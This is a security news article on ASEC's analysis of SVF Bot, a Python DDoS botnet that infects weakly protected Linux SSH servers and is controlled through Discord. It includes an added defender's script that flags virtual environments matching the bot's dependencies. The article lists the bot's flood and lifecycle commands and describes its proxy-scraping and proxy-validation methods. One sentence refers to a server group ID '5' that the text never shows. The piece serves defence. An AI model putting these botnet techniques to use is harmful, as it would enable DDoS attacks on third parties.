In a recent analysis, AhnLab's Security Intelligence Center (ASEC) has uncovered an emerging threat targeting misconfigured and weakly protected Linux servers. The campaign revolves around a Python-based DDoS botnet called SVF Bot, which uses Discord as its command-and-control (C&C) channel, illustrating the growing trend of abusing legitimate platforms for malicious operations.
ASEC researchers, using honeypots with exposed SSH services secured by weak credentials, observed numerous attacks by threat actors deploying SVF Bot malware.
This bot, developed in Python, sets up a virtual environment, installs dependencies like discord, requests, and aiohttp, and retrieves its payload from external servers.
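A host-triage check built around the dependency set named above, written for this page as a defender's example and not taken from ASEC's report or the malware itself; the venv layout (a `pyvenv.cfg` marker and `lib/python*/site-packages`) and the directory-name check are assumptions about how pip lays packages out, and a match is a lead for an analyst, not proof of infection:

```python
"""Find Python virtual environments whose installed packages match the
dependency set the report says SVF Bot installs: discord, requests, aiohttp."""
import os
import tempfile
from pathlib import Path

# Dependency set from the report. Matching on site-packages directory names
# is an assumption about pip's layout; metadata files are not consulted.
SVF_DEPS = {"discord", "requests", "aiohttp"}


def installed_packages(venv: Path) -> set[str]:
    """Return lower-cased top-level package directory names in the venv."""
    found = set()
    for sp in venv.glob("lib/python*/site-packages"):
        found.update(p.name.lower() for p in sp.iterdir() if p.is_dir())
    return found


def matches_svf_profile(packages: set[str]) -> bool:
    """True when every dependency SVF Bot installs is present at once."""
    return SVF_DEPS <= packages


def find_suspicious_venvs(root: Path) -> list[str]:
    """Walk root for pyvenv.cfg markers; report venvs matching the profile."""
    hits = []
    for cfg in root.rglob("pyvenv.cfg"):
        venv = cfg.parent
        if matches_svf_profile(installed_packages(venv)):
            hits.append(str(venv))
    return sorted(hits)


def demo() -> list[str]:
    """Constructed fixture: one venv with the full set, one benign venv."""
    root = Path(tempfile.mkdtemp(prefix="svf_triage_"))
    fixtures = {"bad": SVF_DEPS, "ok": {"requests", "urllib3"}}
    for name, pkgs in fixtures.items():
        sp = root / name / "lib" / "python3.11" / "site-packages"
        sp.mkdir(parents=True)
        (root / name / "pyvenv.cfg").write_text("home = /usr/bin\n")
        for pkg in pkgs:
            (sp / pkg).mkdir()
    return [os.path.relpath(h, root) for h in find_suspicious_venvs(root)]


if __name__ == "__main__":
    print(demo())  # ['bad']
```

On a real host, point `find_suspicious_venvs` at `/`, `/tmp`, `/var/tmp` and home directories, and pair any hit with a look at which process is running from that venv.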
The number “5” indicates a server group ID, allowing attackers to assign infected hosts to manageable botnet clusters.
SVF Bot’s main functionality centers on launching Layer 7 (HTTP flood) and Layer 4 (UDP flood) DDoS attacks. It supports a range of commands issued via Discord, including:
- $http, $customhttp for HTTP floods
- $udp, $customudp for UDP floods
- $load, $unload for managing proxy lists
- $restart, $crash, $stop for bot lifecycle management
“Most of the supported commands are for DDoS attacks, with L7 HTTP Flood and L4 UDP Flood being the main types supported,” the report notes.
One of SVF Bot’s distinguishing features is its integration with public proxy services to increase the stealth and effectiveness of its HTTP flood attacks. The malware scrapes proxy lists from at least 10 public sources, including sslproxies.org, free-proxy-list.net, and GitHub repositories.
“The malware randomly selects a proxy address from the list to use when attempting to connect,” the report explains.
Before use, each proxy undergoes a validation routine involving Google login attempts to ensure functionality.
“The source code contains a description stating that the malware was created by ‘SVF Team’ and that it was developed for fun because the Botnet using PuTTY was not working,” the report states.
The botnet’s functionality and reach suggest a serious threat to undersecured Linux infrastructure.
The ongoing spread of SVF Botnet underscores the need for basic server hygiene and defensive practices. ASEC advises:
- Use strong, non-default passwords and rotate them regularly
- Patch systems and software to the latest versions
- Restrict external access to SSH ports with firewalls